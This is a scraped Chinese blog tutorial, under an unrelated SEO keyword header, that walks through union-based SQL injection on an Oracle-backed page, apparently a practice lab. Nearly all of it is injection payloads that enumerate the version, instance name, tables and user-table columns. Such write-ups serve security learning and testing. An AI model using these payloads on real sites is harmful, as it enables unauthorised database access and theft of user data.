免费网站建设_好玩网页游戏大全_东莞网站公司_怎么推广产品

2025/12/19 22:23:48 来源：https://blog.csdn.net/mirliasheong/article/details/144272822 浏览: 次关键词：免费网站建设_好玩网页游戏大全_东莞网站公司_怎么推广产品

进来之后点下面红框进入到有参数的页面

一.判断注入类型

与其他数据库一样，先判断注入类型，输入

?id=1 and 1=1页面正常

?id=1 and 1=2页面异常，说明存在注入，并且是数值型

二.判断列数

通过order by来判断字段数。因为order by 2⻚⾯正常，order by 3⻚⾯不正常，故判断

当前字段数为2

三.判断回显点

输入?id=1 union select 'null','null' from dual

四.查询数据库版本

输入

?id=-1 union select 'null',(select banner from sys.v_$version where rownum=1) from dual

五.查询数据库名

输入?id=-1 union select 'null',(select instance_name from V$INSTANC

E) from dual

六.查询表名

第一个表名，输入

?id=-1 union select 'null',(select table_name from user_tables where rownum=1) from dual

第二个表名，输入

?id=-1 union select 'null',(select table_name from user_tables where rownum=1 and table_name not in 'LOGMNR_SESSION_EVOLVE$') from dual

第三个表，输入

?id=-1 union select 'null',(select table_name from user_tables where rownum=1 and table_name not in 'LOGMNR_SESSION_EVOLVE$' and table_name not in 'LOGMNR_GLOBAL$') from dual

查询数据库表名，查询表名⼀般查询admin或者user表

所以我们也可以使用模糊搜索，输入

?id=-1 union select 'null',(select table_name from user_tables

where table_name like '%user%' and rownum=1) from dual

七.查询列名

第一列，输入

?id=-1 union select 'null',(select column_name from user_tab_co

lumns where table_name='sns_users' and rownum=1) from dual

第二列，输入

?id=-1 union select 'null',(select column_name from user_tab_co

lumns where rownum=1 and column_name not in 'USER_NAME') from dual

。。。

。。。一次查询（语法：and...not in+上次查询的列名）

同样我们可以使用模糊搜索：

输入

?id=-1 union select 'null',(select column_name from user_tab_columns where table_name='sns_users' and rownum=1 and column_name like '%USER%') from dual

输入

?id=-1 union select 'null',(select column_name from user_tab_columns where table_name='sns_users' and rownum=1 and column_name like '%USER%' and column_name <> 'USER_NAME') from dual